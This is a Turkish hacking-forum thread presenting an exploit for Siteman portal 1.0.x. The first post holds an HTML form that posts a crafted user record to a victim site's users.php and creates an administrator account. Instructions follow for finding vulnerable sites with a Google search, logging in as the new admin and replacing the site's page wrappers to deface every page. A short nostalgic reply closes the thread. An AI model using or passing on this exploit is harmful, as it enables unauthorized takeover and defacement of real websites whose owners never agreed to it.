İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Siteman Portal Açığı

01-12-2006 13:11
#1
f_and_y - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Nereden:
istanbul
Mesajlar:
1.135
Teşekkür (Etti):
0
Teşekkür (Aldı):
162
Konular:
534
Ticaret:
(0) %
Kod:
<html>
<b>These data were recorded.</b><br /><br /><table cellspacing="0"
cellpadding="2"><tr><td>Username(Use this* and not your display name*
when
logging in)</td><td
align="right">sniperjtt</td></tr><tr><td>Password</td><td
align="right"><form><select><option>Click to show password</option>
<option>sniperjtt</option></select></form></td></tr><tr><td>Secret
Question (Asked when you forget your password)</td><td
align="right">sniperjtt</td></tr><tr><td>Answer to secret
question</td><td
align="right"><form>
<select>
<option>Click to show answer</option>
<option>sniperjtt</option>
</select></form>
</td></tr><tr><td>Display name</td><td
align="right">sniperjtt</td></tr><tr><td>Member Level</td><td
align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td
align="right">sttosko@gmail.com</td></tr><tr><td>Hide my email
adress</td><td align="right">no</td></tr><tr><td>Forum
Signature</td><td
align="right">sniperteam</td></table><br /><br />Is this correct?<br
/><table
cellspacing="0" cellpadding="3"><tr><td>

<form action="users.php?do=new" method="post"><input type="submit"
value="no" /></form></td><td>

<form action="http://www.kurbansite.com/users.php?do=docreate";
method="post">
<input type="hidden" name="line"
value="sniperjtt|347a9a8a8d3f364f0bdb82c4208a3207| 5|sttos ko@gmail.com|sniperjtt|1105956827|sniperjtt|347a9a 8a8d3f364f0bdb82c4208a3207|0|0|0|sniperteam"
/><input type="submit" value="yes" /></form></html>





uzantıyı html olarak değiştirin

Sonra googledan "powered by siteman" yazıp araştırın karşınıza çıkan yerden bir sayfa açın misal www.sallama.com açtınız www.sallama.com/portal açıldı(portalın kurulu olduğu dizine dikkat edin). Bunu kopyalayın sonra önceden kaydettiiğimiz html dosyasını açın(notepad ile) orda www.kurbansite.com bulun ve /portalı ekleyinKaydettiğimiz Html dosyasını açın(web browser ile). Karşınıza çıkan sayfada password ve answer to secret question olan yerlerde sniperjtt seçin ve yes butonunu tıklayın.

user artık : sniperjtt şifre:sniperjtt olarak bir admin hesabı oluşturdunuz.Bunlarla siteye login olun login olduktan sonra change acc dan kullanıcı isminizi mailinizi gizli sorunuzu falan değiştirin. Admin panele girin Edit Looks tan Edit HTML-wrappers e tıklayın. Ve alltta iki tane metin girelecek yere kendi indexinizi atın (html code yani). Sitede nereyi açarsanız açın bundan sonra sizin yazdığınız index en üstte ve en altta görülecek.
Açık siteman 1.0.x lerde işe yarıyor ve yaması yok.bu portalı genel olarak tr dışında kullanan var yani bizde nadir hatta yok denecek kadar az.
NOT:bu siteman portallarda bulunan bir açıktır ve değiştirilmiştir.
kolay gelsin...
Kullanıcı İmzası

19-11-2009 15:01
#2
hopeftr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2009
Mesajlar:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
1
Konular:
0
Ticaret:
(0) %
Hey gidi gençliiik ST Tosko
value="sniperjtt|347a9a8a8d3f364f0bdb82c4208a3207| 5|sttos ko@gmail.com|sniperjtt|1105956827|sniperjtt|347a9a 8a8d3f364f0bdb82c4208a3207|0|0|0|sniperteam"

Sarı olarak işaretlediğim alan Sniper Just The Tosko eski mailime kadar herşey editlenmeden duruyo teşekkür ederim güzel paylaşım
rewecetr Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı